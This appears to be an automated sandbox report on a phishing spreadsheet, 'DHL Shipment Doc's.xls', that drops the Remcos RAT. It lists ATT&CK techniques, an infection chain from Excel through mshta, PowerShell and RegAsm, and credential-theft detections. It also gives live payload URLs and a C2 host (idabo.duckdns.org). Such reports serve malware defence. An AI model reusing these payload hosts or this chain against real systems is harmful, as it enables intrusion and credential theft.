                    Source: Yara matchFile source: 00000010.00000002.850008611.0000000003AC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.848958157.0000000000775000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3864, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe33_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information121
                    Scripting
                    Valid Accounts11
                    Native API
                    121
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    13
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts23
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    21
                    Obfuscated Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    21
                    Encrypted Channel
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts223
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    Install Root Certificate
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares21
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Credentials In Files
                    4
                    File and Directory Discovery
                    Distributed Component Object Model211
                    Input Capture
                    1
                    Remote Access Software
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts4
                    PowerShell
                    Network Logon Script322
                    Process Injection
                    1
                    Bypass User Account Control
                    LSA Secrets39
                    System Information Discovery
                    SSH4
                    Clipboard Data
                    2
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials31
                    Security Software Discovery
                    VNCGUI Input Capture213
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation
                    Proc Filesystem4
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt322
                    Process Injection
                    /etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1525543 Sample: DHL Shipment Doc's.xls Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 108 Suricata IDS alerts for network traffic 2->108 110 Found malware configuration 2->110 112 Malicious sample detected (through community Yara rule) 2->112 114 21 other signatures 2->114 13 EXCEL.EXE 59 33 2->13         started        process3 dnsIp4 104 192.3.220.20, 49166, 49168, 49169 AS-COLOCROSSINGUS United States 13->104 106 stylite.io 213.183.76.21, 443, 49165, 49167 PFALZKOM-NETKoschatplatz1DE Germany 13->106 86 C:\Users\...\DHL Shipment Doc's.xls (copy), Composite 13->86 dropped 88 C:\...88ewprojectupdatedwithmegreat[1].hta, HTML 13->88 dropped 168 Microsoft Office drops suspicious files 13->168 18 mshta.exe 10 13->18         started        22 mshta.exe 10 13->22         started        file5 signatures6 process7 dnsIp8 90 stylite.io 18->90 116 Suspicious command line found 18->116 118 PowerShell case anomaly found 18->118 24 cmd.exe 18->24         started        92 213.183.76.22, 443, 49175, 49176 PFALZKOM-NETKoschatplatz1DE Germany 22->92 94 stylite.io 22->94 27 cmd.exe 22->27         started        signatures9 process10 signatures11 140 Suspicious powershell command line found 24->140 142 Wscript starts Powershell (via cmd or directly) 24->142 144 PowerShell case anomaly found 24->144 29 powershell.exe 24 24->29         started        33 powershell.exe 27->33         started        process12 file13 80 C:\...\picturewithgreatdayseverythinggoo.vBS, Unicode 29->80 dropped 82 C:\Users\user\AppData\...\00kppfao.cmdline, Unicode 29->82 dropped 150 Suspicious powershell command line found 29->150 152 Obfuscated command line found 29->152 154 Installs new ROOT certificates 29->154 156 Suspicious execution chain found 29->156 35 wscript.exe 1 29->35         started        38 csc.exe 2 29->38         started        41 wscript.exe 33->41         started        43 csc.exe 33->43         started        signatures14 process15 file16 120 Suspicious powershell command line found 35->120 122 Wscript starts Powershell (via cmd or directly) 35->122 124 Bypasses PowerShell execution policy 35->124 126 2 other signatures 35->126 45 powershell.exe 4 35->45         started        76 C:\Users\user\AppData\Local\...\00kppfao.dll, PE32 38->76 dropped 48 cvtres.exe 38->48         started        50 powershell.exe 41->50         started        78 C:\Users\user\AppData\Local\...\qjwmez35.dll, PE32 43->78 dropped 52 cvtres.exe 43->52         started        signatures17 process18 signatures19 146 Suspicious powershell command line found 45->146 148 Obfuscated command line found 45->148 54 powershell.exe 12 4 45->54         started        58 powershell.exe 50->58         started        process20 dnsIp21 96 raw.githubusercontent.com 185.199.111.133, 443, 49170, 49180 FASTLYUS Netherlands 54->96 136 Writes to foreign memory regions 54->136 138 Injects a PE file into a foreign processes 54->138 60 RegAsm.exe 54->60         started        65 RegAsm.exe 58->65         started        signatures22 process23 dnsIp24 98 idabo.duckdns.org 60->98 100 idabo.duckdns.org 135.148.195.248, 49173, 49177, 6875 AVAYAUS United States 60->100 102 geoplugin.net 178.237.33.50, 49178, 80 ATOM86-ASATOM86NL Netherlands 60->102 84 C:\ProgramData\remcos\logs.dat, data 60->84 dropped 158 Contains functionality to bypass UAC (CMSTPLUA) 60->158 160 Detected Remcos RAT 60->160 162 Tries to steal Mail credentials (via file registry) 60->162 166 7 other signatures 60->166 67 RegAsm.exe 60->67         started        70 RegAsm.exe 60->70         started        72 RegAsm.exe 60->72         started        74 2 other processes 60->74 file25 164 Uses dynamic DNS services 98->164 signatures26 process27 signatures28 128 Tries to steal Instant Messenger accounts or passwords 67->128 130 Tries to steal Mail credentials (via file / registry access) 67->130 132 Searches for Windows Mail specific files 67->132 134 Tries to harvest and steal browser information (history, passwords, etc) 70->134

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    DHL Shipment Doc's.xls13%ReversingLabsDocument-PDF.Trojan.Heuristic
                    DHL Shipment Doc's.xls14%VirustotalBrowse
                    DHL Shipment Doc's.xls100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    stylite.io0%VirustotalBrowse
                    raw.githubusercontent.com0%VirustotalBrowse
                    geoplugin.net0%VirustotalBrowse
                    idabo.duckdns.org1%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%URL Reputationsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://login.yahoo.com/config/login0%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://crl.entrust.net/server1.crl00%URL Reputationsafe
                    http://www.imvu.com0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    https://secure.comodo.com/CPS00%URL Reputationsafe
                    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                    http://www.ebuddy.com0%URL Reputationsafe
                    http://acdn.adnxs.com/ast/ast.js0%VirustotalBrowse
                    http://b.scorecardresearch.com/beacon.js0%VirustotalBrowse
                    http://192.3.220.20/97/RFGBVV.txt3%VirustotalBrowse
                    http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIF3%VirustotalBrowse
                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%VirustotalBrowse
                    http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta3%VirustotalBrowse
                    https://support.google.com/chrome/?p=plugin_flash0%VirustotalBrowse
                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%VirustotalBrowse
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                    http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%VirustotalBrowse
                    https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%VirustotalBrowse
                    http://192.3.220.200%VirustotalBrowse
                    http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htahttp://192.3.220.20/97/ug/Newprojectupdate3%VirustotalBrowse
                    http://cache.btrll.com/default/Pix-1x1.gif0%VirustotalBrowse
                    https://www.google.com0%VirustotalBrowse
                    http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%VirustotalBrowse
                    https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%VirustotalBrowse
                    http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%VirustotalBrowse
                    https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%VirustotalBrowse
                    http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%VirustotalBrowse
                    http://o.aolcdn.com/ads/adswrappermsni.js0%VirustotalBrowse
                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%VirustotalBrowse
                    http://www.nirsoft.net/0%VirustotalBrowse
                    https://stylite.io/noDe0%VirustotalBrowse
                    http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIFp3%VirustotalBrowse
                    http://static.chartbeat.com/js/chartbeat.js0%VirustotalBrowse
                    https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%VirustotalBrowse
                    idabo.duckdns.org1%VirustotalBrowse
                    http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    stylite.io
                    213.183.76.21
                    truefalseunknown
                    raw.githubusercontent.com
                    185.199.111.133
                    truefalseunknown
                    geoplugin.net
                    178.237.33.50
                    truefalseunknown
                    idabo.duckdns.org
                    135.148.195.248
                    truetrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIFtrueunknown
                    http://192.3.220.20/97/RFGBVV.txttrueunknown
                    http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htatrueunknown
                    https://stylite.io/noDefalseunknown
                    idabo.duckdns.orgtrueunknown
                    https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                      unknown
                      http://geoplugin.net/json.gpfalse
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://b.scorecardresearch.com/beacon.jsbhvED5C.tmp.20.drfalseunknown
                      http://192.3.220.20powershell.exe, 0000000E.00000002.448752677.0000000002744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.0000000002798000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://acdn.adnxs.com/ast/ast.jsbhvED5C.tmp.20.drfalseunknown
                      http://www.imvu.comrRegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvED5C.tmp.20.drfalseunknown
                      http://ocsp.entrust.net03mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvED5C.tmp.20.drfalseunknown
                      http://www.nirsoft.netXRegAsm.exe, 00000014.00000002.466186728.0000000000143000.00000004.00000010.00020000.00000000.sdmpfalse
                        unknown
                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000014.00000002.469694981.00000000022C8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvED5C.tmp.20.drfalseunknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvED5C.tmp.20.drfalseunknown
                        http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htaC:mshta.exe, 00000003.00000002.417451118.00000000038C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462003839.0000000000436000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.463988623.0000000000436000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465120785.0000000000436000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465383861.0000000000436000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465313984.00000000003FA000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvED5C.tmp.20.drfalseunknown
                          https://deff.nelreports.net/api/report?cat=msnbhvED5C.tmp.20.drfalse
                          • URL Reputation: safe
                          unknown
                          https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvED5C.tmp.20.drfalseunknown
                          http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htahttp://192.3.220.20/97/ug/Newprojectupdatemshta.exe, 00000003.00000003.415474990.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.415035501.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.463082163.0000000003155000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461490231.0000000003155000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://go.microspowershell.exe, 00000007.00000002.433523996.0000000003C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.473447172.0000000002717000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://stylite.io/noDeumshta.exe, 00000003.00000002.417313522.000000000050A000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              unknown
                              http://cache.btrll.com/default/Pix-1x1.gifbhvED5C.tmp.20.drfalseunknown
                              http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvED5C.tmp.20.drfalseunknown
                              https://www.google.comRegAsm.exe, RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                              https://stylite.io/noDetamshta.exe, 0000000F.00000003.465037707.000000000357D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464321262.000000000357C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464200564.000000000357C000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://stylite.io/noDe3mshta.exe, 0000000F.00000002.465313984.00000000003FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://geoplugin.net/json.gp/Cpowershell.exe, 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://o.aolcdn.com/ads/adswrappermsni.jsbhvED5C.tmp.20.drfalseunknown
                                  http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvED5C.tmp.20.drfalseunknown
                                  https://contoso.com/powershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvED5C.tmp.20.drfalseunknown
                                  http://static.chartbeat.com/js/chartbeat.jsbhvED5C.tmp.20.drfalseunknown
                                  http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIFlpowershell.exe, 00000007.00000002.440709820.000000001A8F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvED5C.tmp.20.drfalseunknown
                                    https://login.yahoo.com/config/loginRegAsm.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIFppowershell.exe, 00000007.00000002.433523996.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.473447172.0000000002717000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htaCmshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://www.nirsoft.net/RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                      http://ocsp.entrust.net0Dmshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://stylite.io/pmshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.433523996.0000000002301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.479554107.00000000022F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.448752677.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.473447172.0000000002381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.498084239.0000000002300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.00000000023A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvED5C.tmp.20.drfalseunknown
                                        http://go.crpowershell.exe, 00000007.00000002.441247952.000000001CB13000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.487987684.000000001C4F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvED5C.tmp.20.drfalseunknown
                                          http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvED5C.tmp.20.drfalse
                                            unknown
                                            http://schemas.dmtf.orpowershell.exe, 00000019.00000002.487987684.000000001C516000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvED5C.tmp.20.drfalse
                                                unknown
                                                https://stylite.io/kmshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvED5C.tmp.20.drfalse
                                                    unknown
                                                    https://raw.gipowershell.exe, 00000020.00000002.486644854.00000000001D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495129914.000000001AD80000.00000004.00000020.00020000.00000000.sdmptrue
                                                      unknown
                                                      http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvED5C.tmp.20.drfalse
                                                        unknown
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.ccleaner.com/go/app_cc_pro_trialkeybhvED5C.tmp.20.drfalse
                                                          unknown
                                                          http://192.3.220.20/mshta.exe, 00000003.00000003.414481683.0000000003931000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466857716.0000000003634000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461589280.0000000003632000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta5mshta.exe, 0000000F.00000003.465037707.000000000357D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464321262.000000000357C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464200564.000000000357C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://crl.entrust.net/server1.crl0mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
